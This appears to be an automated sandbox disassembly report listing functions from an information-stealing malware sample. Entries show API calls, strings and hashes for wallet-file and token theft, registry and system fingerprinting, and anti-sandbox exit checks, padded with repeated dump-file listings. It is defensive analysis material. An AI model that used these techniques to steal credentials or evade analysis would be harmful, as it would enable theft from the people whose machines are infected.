Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: 001b16c51d20197f7e186a38604664ef931edd315f6f5fd9e1db78a02ef061aa
Instruction ID: f3ebce9368cd3ddcef560f9fb02de06f0e249f32f023b29952cbf51ef4b0d7cd
Opcode Fuzzy Hash: 001b16c51d20197f7e186a38604664ef931edd315f6f5fd9e1db78a02ef061aa
Instruction Fuzzy Hash: 9CB156719101099BDB04FBA0CC6ADEE7B38BF94301F50465AF907A7191EF346A4DCB66

Function 00544FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00544FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00544FD1
InternetOpenA.WININET(00560DDF,00000000,00000000,00000000,00000000), ref: 00544FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00545011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00545041
InternetCloseHandle.WININET(?), ref: 005450B9
InternetCloseHandle.WININET(?), ref: 005450C6

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 59b9cab66cbd7aab1b1bb7b8249a661f2e791464a24fe201fad839cdc11c9415
Instruction ID: 008db46b98f5f0d44e15d29e5590954d401bde51a331844b219de2d1ef6bdeee
Opcode Fuzzy Hash: 59b9cab66cbd7aab1b1bb7b8249a661f2e791464a24fe201fad839cdc11c9415
Instruction Fuzzy Hash: 6E31E7B4A40218ABDB20CF54DC89BDDBBB4FB48704F5081D9EA09A7281D7746E858F99

Function 005583DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00558426
wsprintfA.USER32 ref: 00558459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0055847B
RegCloseKey.ADVAPI32(00000000), ref: 0055848C
RegCloseKey.ADVAPI32(00000000), ref: 00558499

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

RegQueryValueExA.KERNEL32(00000000,0127DAF0,00000000,000F003F,?,00000400), ref: 005584EC
lstrlen.KERNEL32(?), ref: 00558501
RegQueryValueExA.KERNEL32(00000000,0127DB08,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00560B34), ref: 00558599
RegCloseKey.KERNEL32(00000000), ref: 00558608
RegCloseKey.ADVAPI32(00000000), ref: 0055861A

Strings

%s\%s, xrefs: 0055844D

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 2060fb0a5a044d894fd238b020ce03e4264bd6bd7d1b79476edd78c3e5ab572c
Instruction ID: 771b677b6ea2fe72d8ad1349b6ce3bf187fe8077ce4a3b2c10e13faffa7866a9
Opcode Fuzzy Hash: 2060fb0a5a044d894fd238b020ce03e4264bd6bd7d1b79476edd78c3e5ab572c
Instruction Fuzzy Hash: 14217C7194021CABEB24DB54CC84FE9B7B8FB48700F10C1D9E609A6140DF74AA85CFE4

Function 00557690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 005576A4
RtlAllocateHeap.NTDLL(00000000), ref: 005576AB
RegOpenKeyExA.KERNEL32(80000002,0126BA80,00000000,00020119,00000000), ref: 005576DD
RegQueryValueExA.KERNEL32(00000000,0127D8B0,00000000,00000000,?,000000FF), ref: 005576FE
RegCloseKey.ADVAPI32(00000000), ref: 00557708

Strings

Windows 11, xrefs: 005576BD

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 2321066e657f836a8166b3c6ecaacf1eee969fd9f03b64cd9250d60dcc0a1f4a
Instruction ID: 608aabfbea9ddaaab5bbc92660ad53ed3c26a568b9e027c14e1f19f51b2f1a3f
Opcode Fuzzy Hash: 2321066e657f836a8166b3c6ecaacf1eee969fd9f03b64cd9250d60dcc0a1f4a
Instruction Fuzzy Hash: 150144B5A44308BBEB00DBE4EC59F6D7BB8EB48701F208456FE05D7190D67899048B55

Function 00557720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557734
RtlAllocateHeap.NTDLL(00000000), ref: 0055773B
RegOpenKeyExA.KERNEL32(80000002,0126BA80,00000000,00020119,005576B9), ref: 0055775B
RegQueryValueExA.KERNEL32(005576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0055777A
RegCloseKey.ADVAPI32(005576B9), ref: 00557784

Strings

CurrentBuildNumber, xrefs: 00557771

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: 16bee51e953570c8c45039db2b45897407176c75f8774393f6a1f05b6fd09a47
Instruction ID: 292d2f52c82b46fda7cd745e4ecb21fef52fd798bb7d2d9fa0c603b26a19de2c
Opcode Fuzzy Hash: 16bee51e953570c8c45039db2b45897407176c75f8774393f6a1f05b6fd09a47
Instruction Fuzzy Hash: 9B0117B5A40308BBEB00DBE4DC49FAEBBB8FB48701F108556FA05A7291DA7455048B65

Function 005540B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 005540D5
RegOpenKeyExA.KERNEL32(80000001,0127D218,00000000,00020119,?), ref: 005540F4
RegQueryValueExA.ADVAPI32(?,0127DBC8,00000000,00000000,00000000,000000FF), ref: 00554118
RegCloseKey.ADVAPI32(?), ref: 00554122
lstrcat.KERNEL32(?,00000000), ref: 00554147
lstrcat.KERNEL32(?,0127DC10), ref: 0055415B

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 6a1a529d48302312f07a93596916d12df846e0c0fbedbfb2ad4eab60c3ecacce
Instruction ID: 788d5956d0849b38476e53e25d0df026bbd32bc410b35bf00aa33cbf5d60ca0a
Opcode Fuzzy Hash: 6a1a529d48302312f07a93596916d12df846e0c0fbedbfb2ad4eab60c3ecacce
Instruction Fuzzy Hash: FD41BAB6D401087BDB14EBA0DC5AFFD777DB788300F008559B61A56181EA755B8C8B92

Function 005569F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00559860: GetProcAddress.KERNEL32(75900000,01270738), ref: 005598A1
Part of subcall function 00559860: GetProcAddress.KERNEL32(75900000,01270798), ref: 005598BA
Part of subcall function 00559860: GetProcAddress.KERNEL32(75900000,012705D0), ref: 005598D2
Part of subcall function 00559860: GetProcAddress.KERNEL32(75900000,01270750), ref: 005598EA
Part of subcall function 00559860: GetProcAddress.KERNEL32(75900000,01270768), ref: 00559903
Part of subcall function 00559860: GetProcAddress.KERNEL32(75900000,01278B40), ref: 0055991B
Part of subcall function 00559860: GetProcAddress.KERNEL32(75900000,01266760), ref: 00559933
Part of subcall function 00559860: GetProcAddress.KERNEL32(75900000,01266820), ref: 0055994C
Part of subcall function 00559860: GetProcAddress.KERNEL32(75900000,012705E8), ref: 00559964
Part of subcall function 00559860: GetProcAddress.KERNEL32(75900000,01270780), ref: 0055997C
Part of subcall function 00559860: GetProcAddress.KERNEL32(75900000,01270618), ref: 00559995
Part of subcall function 00559860: GetProcAddress.KERNEL32(75900000,012706C0), ref: 005599AD
Part of subcall function 00559860: GetProcAddress.KERNEL32(75900000,01266880), ref: 005599C5
Part of subcall function 00559860: GetProcAddress.KERNEL32(75900000,01270630), ref: 005599DE

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 005411D0: ExitProcess.KERNEL32 ref: 00541211

Part of subcall function 00541160: GetSystemInfo.KERNEL32(?), ref: 0054116A
Part of subcall function 00541160: ExitProcess.KERNEL32 ref: 0054117E

Part of subcall function 00541110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0054112B
Part of subcall function 00541110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00541132
Part of subcall function 00541110: ExitProcess.KERNEL32 ref: 00541143

Part of subcall function 00541220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0054123E
Part of subcall function 00541220: __aulldiv.LIBCMT ref: 00541258
Part of subcall function 00541220: __aulldiv.LIBCMT ref: 00541266
Part of subcall function 00541220: ExitProcess.KERNEL32 ref: 00541294

Part of subcall function 00556770: GetUserDefaultLangID.KERNEL32 ref: 00556774

Part of subcall function 00541190: ExitProcess.KERNEL32 ref: 005411C6

Part of subcall function 00557850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
Part of subcall function 00557850: RtlAllocateHeap.NTDLL(00000000), ref: 00557887
Part of subcall function 00557850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F

Part of subcall function 005578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
Part of subcall function 005578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00557917
Part of subcall function 005578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012789F0,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00556AE8
CloseHandle.KERNEL32(00000000), ref: 00556AF9
Sleep.KERNEL32(00001770), ref: 00556B04
CloseHandle.KERNEL32(?,00000000,?,012789F0,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556B1A
ExitProcess.KERNEL32 ref: 00556B22

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: ee31ebacbe12b21e15ead2ff66a29d79a58cccfe7cbf1165183fd3dd5321d53a
Instruction ID: 6497a6133172337643a503fd40492882b901ac90d3a50e916afcc4b435b2b13e
Opcode Fuzzy Hash: ee31ebacbe12b21e15ead2ff66a29d79a58cccfe7cbf1165183fd3dd5321d53a
Instruction Fuzzy Hash: EE31527094010AAADB04F7F0DC6EBEE7F78BF84342F50461AF902A2181EF746509C7A6

Function 005499C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
LocalFree.KERNEL32(0054148F), ref: 00549A90
CloseHandle.KERNEL32(000000FF), ref: 00549A9A

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
